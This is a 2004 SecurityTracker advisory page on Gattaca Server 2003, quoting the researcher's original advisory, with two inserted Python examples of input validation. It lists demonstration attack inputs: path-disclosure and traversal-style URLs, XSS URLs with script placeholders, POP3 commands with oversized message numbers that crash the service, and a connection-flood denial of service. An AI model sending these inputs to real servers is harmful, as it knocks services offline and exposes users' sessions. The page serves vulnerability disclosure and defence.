SecurityTracker.com
Category:   Application (E-mail Server)  >   Gattaca Server
Vendors:   GeeOS Team
Gattaca Server Multiple Input Validation Bugs Let Remote Users Deny Service, Determine System Information, and Conduct Cross-Site Scripting Attacks
SecurityTracker Alert ID:  1010703
SecurityTracker URL:  http://securitytracker.com/id/1010703
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Jul 15 2004
Impact:   Denial of service via network, Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
Exploit Included:  Yes  
Version(s): Gattaca Server 2003 (1.1.10.0)
Description:   Several vulnerabilities were reported in Gattaca Server 2003. A remote user can cause the server to crash. A remote user can also determine the installation path and the web root directory. A remote user can conduct cross-site scripting attacks.

Dr_insane reported that the 'web.tmpl' script does not properly validate user-supplied input in the 'language' and 'template' parameters. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the Gattaca Server software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

Some demonstration exploit URLs are provided:

http://[host]/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=[code]//[code]
http://[host]/web.tmpl?HELPID=8000&TEMPLATE=[code]//[code]&LANGUAGE=lang//en

It is also reported that a remote user can determine the installation path by sending a null byte HTTP request to the target server. A demonstration exploit URL is provided:

http://[host]/%00

It is reported that the server does not properly respond to invalid user-supplied input in the 'language' parameter. A remote user can exploit this to determine the web root directory. A demonstration exploit URL is provided:

http://[host]/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=[whatever]

A remote user can also supply a specially crafted HTTP request to drive CPU utilization on the target system to 100% and make the web service unavailable.

Some demonstration exploit URLs are provided:

http://[host]/index.tmpl?HELPID=1000&TEMPLATE=skins//water&LANGUAGE=/
http://[host]/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=/../../../../
http://[host]/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=.
http://[host]/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=/
http://[host]/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=\
http://[host]/web.tmpl?HELPID=8000&TEMPLATE=skins//[whatever]&LANGUAGE=lang//en
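The path disclosure, the CPU-exhausting LANGUAGE/TEMPLATE values and the XSS payloads above (issues #1 to #4 in the original advisory reproduced below) share one root cause: both parameters are used as path fragments and reflected in error output without validation. The following Python is an added example of the input checks a server would apply, written for this page and not Gattaca's own code; it assumes a '<dir>//<name>' parameter format inferred from the page's URLs and an invented web root.

```python
import re
from pathlib import Path
from urllib.parse import urlsplit, parse_qs, unquote

# Assumed document root for this example; Gattaca's real layout is not modelled.
WEB_ROOT = Path("/srv/wwwroot").resolve()
SEGMENT = re.compile(r"[A-Za-z0-9_-]{1,32}")   # one directory or file name part

def check_param(value):
    """TEMPLATE/LANGUAGE must be exactly '<dir>//<name>' built from safe segments.

    This rejects every demonstration value in the advisory: script fragments,
    '/../../../../', '.', '/', '\\' and anything with a missing segment.
    """
    parts = value.split("//")
    return len(parts) == 2 and all(SEGMENT.fullmatch(p) for p in parts)

def resolve_under_root(value, filename):
    """Build the template path and refuse anything that escapes WEB_ROOT."""
    head, tail = value.split("//")
    candidate = (WEB_ROOT / head / tail / filename).resolve()
    if WEB_ROOT not in candidate.parents:      # second line of defence
        raise ValueError("path escapes web root")
    return candidate

def classify_request(url):
    """Return 'ok' or a rejection reason for one request URL.

    The rejection string is all a client would ever see: it names the bad
    parameter but never a file name or directory, unlike the (X)TMPL errors.
    """
    parts = urlsplit(url)
    if "\x00" in unquote(parts.path):          # the http://[host]/%00 probe
        return "reject: null byte in path"
    qs = parse_qs(parts.query, keep_blank_values=True)
    for name in ("TEMPLATE", "LANGUAGE"):
        values = qs.get(name, [])
        if len(values) != 1 or not check_param(values[0]):
            return "reject: bad %s" % name
    return "ok"
```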

It is also reported that a remote user can open approximately 600 connections to the target server on TCP port 25 or 110 to cause the server to crash.

Finally, it is reported that a remote authenticated user can issue certain list, retr, and uidl POP3 commands to cause the Gattaca service to crash. Some demonstration exploit values are provided:

list 99999999999999999999999
retr 99999999999999999999999
uidl 98409583490583409539405
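For the POP3 crash above (issue #6 in the original advisory reproduced below), the message-number argument of LIST, RETR and UIDL must be treated as untrusted: the snippet of disassembly in the advisory appears to scale the value and use it as a table offset. The following Python is an added example, not Gattaca's code, of an RFC 1939 style argument check over a constructed two-message mailbox.

```python
import re

# Constructed sample maildrop: (size in octets, unique-id, message text) per entry.
MAILBOX = [
    (120, "u1-constructed", "From: a@example.test\r\n\r\nhello\r\n"),
    (340, "u2-constructed", "From: b@example.test\r\n\r\nworld\r\n"),
]
MAX_DIGITS = 9   # message numbers are small; refuse absurd widths before converting

def parse_msg_number(arg, count):
    """Return a 1-based message number, or None if the argument is unusable.

    Rejected: non-digits, over-long digit strings (the advisory's 23-digit
    values), zero, and anything above the number of messages in the drop.
    """
    if not re.fullmatch(r"[0-9]{1,%d}" % MAX_DIGITS, arg):
        return None
    n = int(arg)
    return n if 1 <= n <= count else None

def handle(line, mailbox):
    """Minimal LIST/RETR/UIDL handler for an already authenticated session."""
    parts = line.strip().split()
    if not parts:
        return "-ERR empty command"
    cmd, args = parts[0].upper(), parts[1:]
    if cmd not in ("LIST", "RETR", "UIDL") or len(args) > 1:
        return "-ERR bad command or argument count"
    if cmd == "RETR" and not args:
        return "-ERR RETR needs a message number"
    if not args:   # multi-line scan or unique-id listing, one row per message
        rows = ["%d %s" % (i + 1, m[0] if cmd == "LIST" else m[1])
                for i, m in enumerate(mailbox)]
        return "+OK %d messages\r\n" % len(mailbox) + "\r\n".join(rows) + "\r\n."
    n = parse_msg_number(args[0], len(mailbox))
    if n is None:
        return "-ERR no such message"   # checked path instead of an access violation
    size, uid, body = mailbox[n - 1]
    if cmd == "LIST":
        return "+OK %d %d" % (n, size)
    if cmd == "UIDL":
        return "+OK %d %s" % (n, uid)
    return "+OK %d octets\r\n%s." % (size, body)
```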

The original advisory is available at:

http://members.lycos.co.uk/r34ct/main/Gattaca%20Server%202003.txt

Impact:   A remote user or a remote authenticated user can cause the service to crash.

A remote user can also determine the installation path and the web root directory.

A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the Gattaca software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

Solution:   No solution was available at the time of this entry.
Vendor URL:  www.gattaca-server.com/
Cause:   Input validation error
Underlying OS:  Windows (NT), Windows (2000), Windows (XP)

Message History:   None.


Source Message Contents

Subject:  http://members.lycos.co.uk/r34ct/main/Gattaca%20Server%202003.txt


http://members.lycos.co.uk/r34ct/main/Gattaca%20Server%202003.txt



www.r34ct.tk

Security Advisory


Advisory Name: Gattaca Server 2003 (1.1.10.0)
  Release Date: 07/15/2004
   Application: Gattaca Server 2003 (1.1.10.0)
      Platform: Windows XP/NT
      Severity: Medium
        Author: dr_insane (dr_insane@pathfinder.gr)


Description:
A high performance Windows NT based Mail and Web Server software for building your own intranet. You may register unlimited users and use unlimited domains. Supports the POP3, SMTP, and HTTP protocols. Integrated with the TMPL library, allowing you to write your own CGI scripts.

Multiple vulnerabilities have been identified in Gattaca Server 2003 that may allow a remote attacker to compromise a remote system.


Details:

Issue #1: Installation path exposure

A malicious user can gain knowledge of the installation path by sending a null byte to the server.

example: http://[host]/%00

Output:
--------------------------------------------------------------------------------
(X)TMPL error
File [C:\Program Files\Gattaca Server\doc\webadmin\index.cgi] not found or invalid
Virtual Host at C:\Program Files\Gattaca Server\doc\webadmin\
--------------------------------------------------------------------------------


Issue #2: WWW-root path exposure

There is a second vulnerability that can be used to reveal the WWW root directory. Input passed to the "Language" parameter in certain scripts isn't properly sanitised before being returned to the user.

example: http://[host]/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=[whatever]

Output:
--------------------------------------------------------------------------------
(X)TMPL error
File /whatever/_head.tmpl not found or invalid
Virtual Host at C:\GeeOSPub\wwwroot\
--------------------------------------------------------------------------------

--------------------------------------------------------------------------------
(X)TMPL error
File /whatever/web.tmpl not found or invalid
Virtual Host at C:\GeeOSPub\wwwroot\
--------------------------------------------------------------------------------

--------------------------------------------------------------------------------
(X)TMPL error
File /whatever/_foot.tmpl not found or invalid
Virtual Host at C:\GeeOSPub\wwwroot\
--------------------------------------------------------------------------------

Issue #3: Denial of Service attack

The third issue is a denial of service attack that can be used to slow a remote system. The CPU usage will hit 100% and the server will become unavailable.

Examples:
http://[host]/index.tmpl?HELPID=1000&TEMPLATE=skins//water&LANGUAGE=/
http://[host]/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=/../../../../
http://[host]/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=.
http://[host]/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=/
http://[host]/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=\
http://[host]/web.tmpl?HELPID=8000&TEMPLATE=skins//[whatever]&LANGUAGE=lang//en

Issue #4: Cross site scripting injection

Another vulnerability has been found in Gattaca Server, which can be exploited by malicious people to conduct XSS attacks. This can be exploited by creating a malicious link including script code, which will be executed in a user's browser when the link is clicked or a malicious web site is visited. Successful exploitation may result in disclosure of various information (e.g. cookie-based authentication information) associated with the site running OmniHTTPd or inclusion of malicious content, which the user thinks is part of the real website.

examples:
http://[host]/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=[code]//[code]
http://[host]/web.tmpl?HELPID=8000&TEMPLATE=[code]//[code]&LANGUAGE=lang//en


Issue #5: Denial of service attack [2]

Gattaca Server fails to handle multiple open connections on ports 25/tcp and 110/tcp. By establishing about 600 connections on port 25 or port 110 the server will crash.


Issue #6: Denial of service attack [3] - message handling

By connecting and authenticating on the POP3 service a remote user can crash the Gattaca service. There are multiple problems in the way the server handles the commands list, retr and uidl.

example:
C:\>telnet r34ct-krew 110
+OK GeeOS/1.1 POP3 Server ver 1.0, ready :-).<3824.50a943410378@pomonis>
user test
+OK User name accepted, password please :-|
pass w
+OK GeeOS mail box open ;-)
list 99999999999999999999999
retr 99999999999999999999999
uidl 98409583490583409539405

The commands above will crash the server. An error message will be generated:
"Unhandled exception in: geeosserv.exe (TMAIL.DLL):0x0000005: access violation."

-------------snip---------------
0037A382   or          eax,eax
0037A384   je          0037A4C5
0037A38A   mov         edi,eax
0037A38C   shl         edi,4
0037A38F   cmp         dword ptr [ebp+edi-7624h],0FFh
0037A397   je          0037A46F
0037A39D   mov         edi,eax
0037A39F   shl         edi,4
0037A3A2   cmp         byte ptr [ebp+edi-762Ch],0
0037A3AA   je          0037A416
0037A3AC   mov         edi,eax
0037A3AE   mov         esi,edi
0037A3B0   shl         esi,4
------------snip----------------

Workaround:
Use another product


Credit:
Dr_insane
http://members.lycos.co.uk/r34ct/


Feedback
Please send your comments to: dr_insane@pathfinder.gr


Copyright 2018, SecurityGlobal.net LLC